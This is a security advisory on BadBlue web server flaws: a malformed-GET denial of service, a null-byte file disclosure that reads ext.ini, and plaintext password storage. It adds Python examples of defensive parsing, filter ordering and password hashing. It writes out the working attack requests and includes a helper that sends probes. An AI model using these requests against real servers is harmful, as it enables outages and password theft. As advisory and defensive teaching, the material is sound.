Three BadBlue Vulnerabilities
Advisory: Working Resources BadBlue Multiple Vulnerabilities

Issue: Three vulnerabilities: a denial of service, insecure (plaintext)
password storage, and a file disclosure vulnerability that allows the
configuration file holding those passwords to be read remotely.

Risk: Critical

SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of
Service Vulnerability" describes one of these issues.

Invalid GET Request Vulnerability
----------------------------------

Sending a GET request whose request line carries no request-target (nothing
between the method and the protocol version) causes the server to stop
handling further requests. The administrator must fully exit and manually
restart the server to resume normal operation:

GET HTTP/1.0

Some installations withstood this request but failed on a similar one:

GET  HTTP/1.0

The only difference is two spaces between "GET" and "HTTP/1.0" instead of
one, so a test for this issue should send both variants.
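The request-line handling at issue, as an added example that is not part of the advisory and not BadBlue's own code: a naive parser and a defensive one are run over the two probe lines above, and a helper builds each line as a raw request and sends it to a host you are authorised to test. The function names, the 8192-byte line limit and the send_and_check host/port parameters are this example's own.

```python
"""Added example (not from the advisory, and not BadBlue's code): how a
request line with a missing request-target fares under a naive parser
versus a defensive one, and how to build the advisory's two probe lines
as raw requests for testing a server you are authorised to test."""
import re
import socket

# The two request lines from the advisory: one space, then two spaces.
PROBE_ONE_SPACE = "GET HTTP/1.0"
PROBE_TWO_SPACES = "GET  HTTP/1.0"

VERSION_RE = re.compile(r"^HTTP/\d\.\d$")


def naive_parse(line):
    """Splits on a single space and trusts that three fields exist.
    Returns None where a real server would raise an unhandled exception.
    The two probes take different paths here: the one-space line has only
    two fields, the two-space line parses but yields an empty target,
    which is the sort of difference that makes one variant survive
    where the other does not."""
    parts = line.split(" ")
    try:
        return parts[0], parts[1], parts[2]
    except IndexError:
        return None


def parse_request_line(line):
    """Defensive parser. Returns (400, None) for anything malformed so the
    caller can answer with an error and keep serving, or (200, fields)."""
    if len(line) > 8192 or any(ord(c) < 0x20 for c in line):
        return 400, None
    parts = line.split()          # any whitespace run, so '  ' behaves like ' '
    if len(parts) != 3:
        return 400, None
    method, target, version = parts
    if not (method.isascii() and method.isalpha() and method.isupper()):
        return 400, None
    if not (target.startswith("/") or target == "*"):
        return 400, None
    if not VERSION_RE.match(version):
        return 400, None
    return 200, (method, target, version)


def build_raw_request(line):
    """Raw bytes of an HTTP/1.0 request consisting of just this line."""
    return (line + "\r\n\r\n").encode("ascii")


def send_and_check(host, port, line, timeout=5.0):
    """Send one request line and report whether the server replies at all.
    Call with 'GET / HTTP/1.0' before and after each probe: a server that
    answered before the probe and is silent afterwards has been wedged."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_raw_request(line))
            return len(s.recv(64)) > 0
    except OSError:
        return False
```

send_and_check does real network I/O and is only for hosts you are authorised to test; the expected pattern on a vulnerable server is a reply to the baseline request before the probe and none afterwards, whereas a correctly behaving server answers every malformed line with a 400 and keeps going.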

Malformed Escaping Invalid Byte Vulnerability
-----------------------------------------------

By sending a malformed version of the HTTP-escaped NULL byte ("%00"), BadBlue
can be made to return the source of the requested file (or its raw content if
the file is binary) instead of processing it. This can be used to read
EXT.INI, which stores BadBlue's configuration data, including any users and
Access Control Lists (ACLs) on the server and the passwords for them. The
attacker simply appends ".% 00.txt" to the filename. BadBlue's null-byte
filter runs on the raw request path and looks for the literal sequence
"%00", so "% 00" passes it; the server then strips spaces from the path
before percent-decoding it, which turns "% 00" back into "%00" and decodes
it to a null byte. BadBlue therefore sees a request for a ".txt" file, while
the operating system's file open stops at the null byte, so the file actually
opened is ext.ini. The request:

GET /ext.ini.% 00.txt HTTP/1.0

reveals the contents of the BadBlue configuration file. Where a server is
configured to allow uploads but to require a password for read or execute
access, this recovers that password and so defeats the protection entirely.
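The filter-ordering bug described above, as an added example that is not part of the advisory and not BadBlue's own code: a model of the vulnerable order (reject a literal "%00", then strip spaces, then percent-decode) beside the correct order (reject malformed input, decode once, validate the decoded name), with the extension check and the filesystem open deliberately shown seeing different names. The SERVED_VERBATIM set, the function names and the modelled Win32 handling of trailing dots are this example's assumptions.

```python
"""Added example, not BadBlue's code: a model of the filter ordering the
advisory describes (reject a literal "%00", then strip spaces, then
percent-decode) beside the correct ordering, and the reason the trick
works: the server's extension check and the operating system's file open
see two different names once a NUL byte is in the path."""
import re
from urllib.parse import unquote

# Assumption for the model: only these extensions are sent back verbatim.
SERVED_VERBATIM = {".txt", ".htm", ".html", ".gif", ".jpg"}

# A "%" that is not followed by two hex digits is a malformed escape.
MALFORMED_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")


def _extension(path):
    name = path.rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def vulnerable_resolve(raw_target):
    """Order of operations as the advisory describes it."""
    if "%00" in raw_target.lower():          # 1. NUL filter on the raw text
        return "rejected"
    collapsed = raw_target.replace(" ", "")  # 2. spaces stripped afterwards
    decoded = unquote(collapsed)             # 3. percent-decoding: %00 -> NUL
    if _extension(decoded) not in SERVED_VERBATIM:
        return "rejected"                    # checked on the full string
    # A C-style open() stops at the NUL. Modelled Win32 behaviour: trailing
    # dots and spaces are dropped from the name, so "ext.ini." opens "ext.ini".
    opened = decoded.split("\x00", 1)[0].rstrip(". ")
    return "served:" + opened


def hardened_resolve(raw_target):
    """Reject malformed escapes and raw spaces, decode once, validate the
    decoded name, and only then check the extension on the same string the
    filesystem will see."""
    if " " in raw_target or MALFORMED_ESCAPE.search(raw_target):
        return "rejected"
    decoded = unquote(raw_target)
    if any(ord(c) < 0x20 for c in decoded):  # NUL and other control bytes
        return "rejected"
    if ".." in decoded.split("/"):           # no directory traversal
        return "rejected"
    if _extension(decoded) not in SERVED_VERBATIM:
        return "rejected"
    return "served:" + decoded
```

The point of the comparison is that the vulnerable version validates a string it has not finished transforming: every later step (space removal, decoding, the NUL stop in the filesystem call) changes what the name means, so the check has to run on the final form, and the name handed to the filesystem must be the name that was checked.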

Un-encrypted Password Vulnerability
--------------------------------------

This vulnerability concerns how passwords are stored in the ext.ini file
discussed above. BadBlue writes them in plaintext, with no encryption or
hashing, so simply opening the file is enough to steal them: any local user
with read access to the configuration file can see the password for every
secured resource and user account. Combined with the file disclosure
vulnerability above, the same is true for a remote attacker against any
vulnerable BadBlue server.
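The storage problem described above, as an added example that is not part of the advisory and not BadBlue's own code: what a reader of a plaintext credential file obtains, beside the form that would have left the file useless to an attacker, a salted PBKDF2 hash that can be verified but not reversed. The ini layout is constructed for illustration (the advisory does not show ext.ini's real format), and the function names and iteration count are this example's own.

```python
"""Added example, not BadBlue's code. The ini layout below is constructed
for illustration; BadBlue's real ext.ini format is not shown in the
advisory. Shown: what an attacker who can read a plaintext credential
file learns, and the hashed storage form that denies them the passwords
while still letting the server authenticate users."""
import configparser
import hashlib
import hmac
import os

# Constructed sample of a plaintext credential store (hypothetical layout).
SAMPLE_INI = """[Users]
admin=Sup3rS3cret
guest=guest
[Shares]
Private=MyPa55word
"""

PBKDF2_ITERATIONS = 600_000


def _load(ini_text):
    cp = configparser.ConfigParser()
    cp.optionxform = str           # keep the case of user and share names
    cp.read_string(ini_text)
    return cp


def extract_plaintext_credentials(ini_text):
    """What a reader of the file gets: every credential value verbatim."""
    cp = _load(ini_text)
    return {f"{section}/{name}": value
            for section in cp.sections()
            for name, value in cp.items(section)}


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex'. A fresh
    random salt per password means equal passwords hash differently."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(),
                                        digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def convert_to_hashed(ini_text):
    """Rewrite every credential value as a salted hash; the result still
    authenticates users but no longer reveals their passwords."""
    cp = _load(ini_text)
    for section in cp.sections():
        for name, value in list(cp.items(section)):
            cp.set(section, name, hash_password(value))
    lines = []
    for section in cp.sections():
        lines.append(f"[{section}]")
        lines.extend(f"{name}={value}" for name, value in cp.items(section))
    return "\n".join(lines) + "\n"
```

With the hashed form, the file disclosure above would still leak user names and the server layout, which matters, but an attacker would be left guessing passwords offline against a slow, salted hash instead of reading them off the page.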